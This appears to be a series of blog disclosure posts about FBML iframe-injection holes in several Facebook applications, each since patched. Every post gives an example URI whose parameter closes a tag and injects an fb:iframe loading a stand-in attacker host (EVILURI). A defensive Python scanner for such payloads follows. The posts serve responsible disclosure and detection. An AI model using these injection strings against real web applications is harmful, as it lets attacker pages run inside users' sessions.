FAXX Hack: Death’s Time

Current Monthly Active Users: 11,802,383

Current Rank on Application Leaderboard: 16

Application Developer: 3happybytes

Responsiveness: I received no communication at first from the developers, but Facebook did. The hole was patched about a week after notification. After patching, the developer got in touch to confirm the fix.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/death-time/result.php?dia=1&anio=1991&mes=1%22%2F%3E%3C%2Fa%3E%3C%2Fp%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E


FAXX Hack: Willy’s Sweet Shop

Facebook Verified Application

Current Monthly Active Users: 853,598

Current Rank on Application Leaderboard: 136

Application Developer: Mob Science

Responsiveness: Facebook has been in touch with the developers, and today (about a week after notification) they issued a patch.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/ochristmastree/?id=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E


FAXX Hack: Trazzler

Facebook Verified Application

Current Monthly Active Users: 5,448

Current Rank on Application Leaderboard: 2,833

Application Developer: Trazzler

Responsiveness: The developers at Trazzler have been responsive, and I’ve been working with them to try and get the hole patched. I was honestly a little disappointed by the information they got from Facebook about the hole, but that’s for another post.

Vulnerability Status: Unpatched (update: Patched Sep. 24)

Example URI: http://apps.new.facebook.com/trazzler/ajax/browse_navigation/?browse-search=%3Cfb%3Aiframe+src%3D'http%3A%2F%2FEVILURI%2F'%3E

Notes: See the leaderboard rank of Trazzler? I chose to check it after looking at the list of Facebook Verified Applications, which means AppData lists around 2,800 applications I haven’t checked which have higher MAU than Trazzler. This Month of Facebook Bugs only begins to scratch the surface of Facebook applications.


FAXX Hack: My Zoo

Current Monthly Active Users: 953,784

Current Rank on Application Leaderboard: 124

Application Developer: Eyrewood Studios

Responsiveness: I did not have direct contact information for the developer, so I forwarded this request to Facebook, and the hole has since been patched.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/myownzoo/friends.php?uid=1527549541%5C%27%2F%3E%3Cfb%3Aiframe%20src%3D%22http%3A%2F%2Feviluri%22%3E


FAXX Hack: Hugged

Facebook Verified Application

Current Monthly Active Users: 3,169,974

Current Rank on Application Leaderboard: 51

Application Developer: Manakki

Responsiveness: I did not receive any responses from Manakki, but they did patch the hole – the example URI below now brings up a page that says, “Please go away.”

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/huggees/experi?hid=318&idz=1077687358%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Feviluri%2F%22%3E


FAXX Hack: SocialCalendar

Facebook Verified Application

Current Monthly Active Users: 1,661,572

Current Rank on Application Leaderboard: 93

Application Developer: SocialCalendar.com

Responsiveness: I received an e-mail back from SocialCalendar the day after contacting them, and they noted that they take information security seriously.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/socialcal/?x=0&ref=&sc_op=showView&sc_v=movieList&sc_movie_category=upcoming&sc_page=1%3Cfb:iframe+src%3D%22http://eviluri/%22%3E&sc_max_page_viewed=1

Example POST Request: http://apps.facebook.com/socialcal/?sc_movie_search_type=NAME&sc_movie_search_query="/><fb:iframe src="http://eviluri/">&sc_op=showView&sc_v=movieSearch


FAXX Hack: Circle of Friends

Posting these is not an automated process, and I was on the road most of yesterday, so again I apologize for being a day late. This counts as Friday’s FAXX Hack.

Current Monthly Active Users: 635,797

Current Rank on Application Leaderboard: 172

Application Developer: Bantr

Responsiveness: I received an e-mail about a day after reporting the hole to let me know that Bantr had fixed it.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/friendcircles/circle_settings.php?circle_id=%22%2F%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E


FAXX Hack: Brain Buddies

Facebook Verified Application

Current Monthly Active Users: 4,861,078

Current Rank on Application Leaderboard: 38

Application Developer: wooga – world of gaming

Responsiveness: Wooga did not send any messages, but did patch the hole.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/brainbuddies/?ref=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E
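Every Example URI in this batch has the same shape: a parameter value that closes the attribute and tag the app echoes it into (the `"/>` or `\'/>` prefix), then injects `<fb:iframe src="http://EVILURI/">` so the app's FBML canvas loads an attacker-controlled page. The Brain Buddies URI above also shows the payload URL-encoded twice, which is what a scanner has to expect when an app decodes a parameter more than once. The scanner below is an added example for this page, not code from the original posts or from any of the affected apps; the `Finding` type, the function names, the decode depth limit of 3, and the last, fully double-encoded sample request are my own constructions, while the other sample requests are the Example URIs and POST body quoted above.

```python
"""FAXX-style injection scanner: flag request parameters carrying an <fb:iframe>.

Added example for this page (not code from the posts or the affected apps).
It decodes each raw query parameter repeatedly, up to a small depth, and
reports the first depth at which an fb:iframe tag becomes visible, so a
double-encoded payload (Brain Buddies) is caught as well as a plain one.
"""
import re
from typing import List, NamedTuple, Optional, Tuple
from urllib.parse import unquote_plus, urlsplit

# An fb:iframe tag whose src is quoted with ", with ', or not at all.
FB_IFRAME_RE = re.compile(
    r"<fb:iframe\b[^>]*\bsrc\s*=\s*(['\"]?)([^'\"\s>]+)\1",
    re.IGNORECASE,
)


class Finding(NamedTuple):
    param: str   # query parameter carrying the payload
    depth: int   # number of URL-decodes applied before the tag appeared
    src: str     # where the injected fb:iframe points


def find_fb_iframe(raw_value: str, max_depth: int = 3) -> Optional[Tuple[int, str]]:
    """Return (depth, src) for the first decode depth at which an fb:iframe
    tag is visible in raw_value, or None if none appears within max_depth."""
    current = raw_value
    for depth in range(max_depth + 1):
        match = FB_IFRAME_RE.search(current)
        if match:
            return depth, match.group(2)
        decoded = unquote_plus(current)
        if decoded == current:      # nothing left to decode
            return None
        current = decoded
    return None


def scan_query(query: str, max_depth: int = 3) -> List[Finding]:
    """Scan a still-encoded query string or form body, parameter by parameter.
    Splitting manually (instead of parse_qs) keeps the raw value so that depth 0
    means 'the tag was sent literally', as in the SocialCalendar POST body."""
    findings: List[Finding] = []
    for part in query.split("&"):
        if not part:
            continue
        name, _, raw_value = part.partition("=")
        hit = find_fb_iframe(raw_value, max_depth)
        if hit is not None:
            depth, src = hit
            findings.append(Finding(unquote_plus(name), depth, src))
    return findings


def scan_uri(uri: str, max_depth: int = 3) -> List[Finding]:
    """Convenience wrapper: scan the query component of a full request URI."""
    return scan_query(urlsplit(uri).query, max_depth)


# Sample requests. The first four are taken from the posts above; the last is a
# constructed, fully double-encoded variant (not from the page) to exercise depth 2.
SAMPLES = [
    ("Death's Time", "http://apps.facebook.com/death-time/result.php?dia=1&anio=1991&mes=1%22%2F%3E%3C%2Fa%3E%3C%2Fp%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E"),
    ("My Zoo", "http://apps.facebook.com/myownzoo/friends.php?uid=1527549541%5C%27%2F%3E%3Cfb%3Aiframe%20src%3D%22http%3A%2F%2Feviluri%22%3E"),
    ("SocialCalendar", "http://apps.facebook.com/socialcal/?x=0&ref=&sc_op=showView&sc_v=movieList&sc_movie_category=upcoming&sc_page=1%3Cfb:iframe+src%3D%22http://eviluri/%22%3E&sc_max_page_viewed=1"),
    ("Brain Buddies", "http://apps.facebook.com/brainbuddies/?ref=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E"),
    ("constructed double-encoded", "http://apps.facebook.com/example/?ref=%2522%252F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522http%253A%252F%252Feviluri%252F%2522%253E"),
]

if __name__ == "__main__":
    for label, uri in SAMPLES:
        for finding in scan_uri(uri):
            print(f"{label}: param={finding.param!r} decode_depth={finding.depth} src={finding.src}")
```

Run against a web server's access log, the same loop over each request's query string will flag the attack attempts (and, after the fix, the probes that now hit Hugged's "Please go away." page). The depth value is also a useful triage hint: a hit at depth 2 or more means the app decoded the parameter more than once, which is a bug in its own right.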

